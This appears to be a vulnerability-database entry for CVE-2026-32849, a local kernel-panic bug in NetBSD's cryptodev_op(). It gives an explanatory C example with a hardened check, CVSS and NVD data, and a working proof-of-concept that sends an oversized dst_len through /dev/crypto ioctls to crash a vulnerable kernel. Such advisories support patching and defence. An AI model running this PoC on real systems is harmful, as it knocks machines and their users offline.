Security Vulnerability Report
CVE-2026-32849 CVSS 5.5 MEDIUM

Published: 2026-05-18 18:17:23
Last Modified: 2026-05-18 19:42:03

Description

NetBSD prior to commit ec8451e contains a signed integer overflow (CWE-190) in cryptodev_op() in sys/opencrypto/cryptodev.c. The local variable iov_len is declared as a signed int but is assigned from cop->dst_len, an unsigned field of the user-supplied struct crypt_op, so a dst_len above INT_MAX wraps to a negative iov_len that the kernel goes on to use as the uio buffer length. A local attacker with access to /dev/crypto who has set up a compression session can trigger this with a single CIOCCRYPT request carrying dst_len > INT_MAX; the corrupted uio length and pointer arithmetic end in a NULL pointer dereference (CWE-476) and a kernel panic on kernels running without SVS (Separate Virtual Space; written CONFIG_SVS in the original advisory text). The impact is a local denial of service; no confidentiality or integrity impact is claimed.
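The description hinges on one C detail: a signed local receiving an unsigned, user-controlled length. The block below is an added example written for this page, not NetBSD code and not the fix in ec8451e. It models only the two crypt_op fields the bug involves in a constructed struct req, shows what the int/unsigned comparison and the assignment do once dst_len exceeds INT_MAX, and puts one possible bounds check beside the buggy shape. REQ_MAX, iov_len_vulnerable and iov_len_hardened are names chosen here; REQ_MAX is modelled on the request-size cap cryptodev_op() already applies to cop->len, and the sample inputs are constructed.

```c
#include <assert.h>
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Constructed stand-in for the ioctl argument.  Only the two fields the
 * bug involves are modelled; the real struct crypt_op has more.
 */
struct req {
	unsigned int len;	/* src len, as in crypt_op */
	unsigned int dst_len;	/* dst len if not 0, as in crypt_op */
};

/* Hypothetical cap for this example, modelled on the len check in cryptodev_op(). */
#define REQ_MAX (256u * 1024u - 4u)

/*
 * The buggy shape: a signed int receives an unsigned value.  Returns the
 * length that would end up in the iovec (a size_t), so the caller can see
 * how a "negative" length turns into a huge one.
 */
size_t
iov_len_vulnerable(const struct req *cop, bool comp_session)
{
	int iov_len = (int)cop->len;

	if (comp_session && cop->dst_len != 0) {
		/*
		 * `iov_len < cop->dst_len` in the original is an int/unsigned
		 * comparison: the usual arithmetic conversions turn iov_len
		 * into unsigned, so any dst_len above INT_MAX compares as larger.
		 */
		if ((unsigned int)iov_len < cop->dst_len)
			iov_len = (int)cop->dst_len;	/* wraps negative above INT_MAX */
	}
	/* Storing a negative int into a size_t yields a value near SIZE_MAX. */
	return (size_t)iov_len;
}

/*
 * One possible hardening (not necessarily what upstream did in ec8451e):
 * keep lengths unsigned end to end and bound dst_len before it is used.
 * Returns 0 with the length in *out, or -1 for a request to reject (E2BIG).
 */
int
iov_len_hardened(const struct req *cop, bool comp_session, size_t *out)
{
	size_t iov_len = cop->len;

	if (cop->len > REQ_MAX)
		return -1;
	if (comp_session && cop->dst_len != 0) {
		if (cop->dst_len > REQ_MAX)
			return -1;
		if (iov_len < cop->dst_len)
			iov_len = cop->dst_len;
	}
	*out = iov_len;
	return 0;
}

int
main(void)
{
	/* Constructed inputs: a benign decompress request and the CVE trigger. */
	struct req benign = { .len = 64, .dst_len = 4096 };
	struct req trigger = { .len = 64, .dst_len = 0x80000000u };	/* INT_MAX + 1 */
	size_t n = 0;

	printf("benign:  vulnerable=%zu hardened rc=%d len=%zu\n",
	    iov_len_vulnerable(&benign, true),
	    iov_len_hardened(&benign, true, &n), n);
	printf("trigger: vulnerable=%#zx hardened rc=%d\n",
	    iov_len_vulnerable(&trigger, true),
	    iov_len_hardened(&trigger, true, &n));
	return 0;
}
```

Compiling the original form `iov_len < cop->dst_len` with -Wall -Wextra (which enables -Wsign-compare) flags the mismatch, which is the cheapest check for this class of bug in ioctl handlers that copy sizes out of user structs. One caveat on the wording: in C the unsigned-to-int conversion itself is implementation-defined rather than undefined; it wraps to a negative value on the compilers NetBSD builds with, and the kernel corruption comes from what is subsequently done with that negative length.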

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No CPE configuration data is published for this CVE (NVD status: Deferred). The affected range stated in the advisory is:

NetBSD < commit ec8451e

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * PoC for CVE-2026-32849
 * Attempts to trigger the signed/unsigned mismatch on cop->dst_len in
 * NetBSD's cryptodev_op().  The expected outcome on a vulnerable kernel is
 * a panic (local DoS), so run this only on a disposable test system.
 *
 * Compile on NetBSD: cc -o poc_netbsd_crypto poc_netbsd_crypto.c
 *
 * The struct layouts and ioctl numbers come from the system's own
 * <crypto/cryptodev.h> (NetBSD's installed copy of sys/opencrypto/cryptodev.h)
 * rather than hand-rolled copies: NetBSD's crypt_op carries len before src
 * and has a mac pointer, its session_op has a comp_alg field, and the CIOC*
 * ioctls use the 'c' group, so a mismatched layout would only earn EINVAL.
 */
#include <sys/types.h>
#include <sys/ioctl.h>
#include <crypto/cryptodev.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int
main(void)
{
	struct session_op sess;
	struct crypt_op cop;
	unsigned char src[64];
	unsigned char dst[64];
	int fd;

	/* Open the crypto device. */
	fd = open("/dev/crypto", O_RDWR);
	if (fd < 0) {
		perror("open /dev/crypto");
		return 1;
	}
	printf("[+] Opened /dev/crypto\n");

	/*
	 * Compression session, as the advisory requires: cop->dst_len is only
	 * consulted for sessions that have a compression algorithm attached.
	 */
	memset(&sess, 0, sizeof(sess));
	sess.comp_alg = CRYPTO_DEFLATE_COMP;
	if (ioctl(fd, CIOCGSESSION, &sess) < 0) {
		perror("ioctl(CIOCGSESSION)");
		close(fd);
		return 1;
	}
	printf("[+] Session created with ID: %u\n", sess.ses);

	/* Real (small) buffers so the request is otherwise well-formed. */
	memset(src, 0, sizeof(src));
	memset(dst, 0, sizeof(dst));
	memset(&cop, 0, sizeof(cop));
	cop.ses = sess.ses;
	cop.op = COP_DECOMP;	/* compression-session op; dst_len sizes the output */
	cop.src = src;
	cop.dst = dst;
	cop.len = sizeof(src);

	/*
	 * Trigger: in the kernel, int iov_len = cop->dst_len (u_int).
	 * Any value above INT_MAX becomes negative, and that negative length
	 * is then used for the uio iovec and the allocation behind it.
	 */
	cop.dst_len = 0xFFFFFFFFu;	/* 4294967295 > INT_MAX */
	printf("[+] Sending CIOCCRYPT with dst_len = %#x\n", cop.dst_len);
	printf("[!] On a vulnerable kernel this is expected to panic (DoS).\n");

	if (ioctl(fd, CIOCCRYPT, &cop) < 0) {
		/* A patched kernel should reject the request cleanly here. */
		perror("ioctl(CIOCCRYPT)");
	}

	close(fd);
	return 0;
}

References

https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f (fixing commit ec8451e)
https://nasm.re/posts/uaf_netbsd_crypto/
https://www.vulncheck.com/advisories/netbsd-signed-integer-overflow-in-cryptodev-op-via-cryptodev-c

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32849", "sourceIdentifier": "[email protected]", "published": "2026-05-18T18:17:23.377", "lastModified": "2026-05-18T19:42:03.353", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NetBSD prior to commit ec8451e contains a signed integer overflow vulnerability in the cryptodev_op() function in sys/opencrypto/cryptodev.c where the local variable iov_len is declared as a signed int but assigned from an unsigned cop->dst_len value, causing undefined behavior when cop->dst_len exceeds INT_MAX. A local attacker with access to /dev/crypto and a compression session type can exploit this vulnerability by providing a dst_len value exceeding INT_MAX to trigger a kernel panic through NULL pointer dereference when CONFIG_SVS is disabled and corrupted UIO pointer arithmetic."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": 
"NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f", "source": "[email protected]"}, {"url": "https://nasm.re/posts/uaf_netbsd_crypto/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/netbsd-signed-integer-overflow-in-cryptodev-op-via-cryptodev-c", "source": "[email protected]"}]}}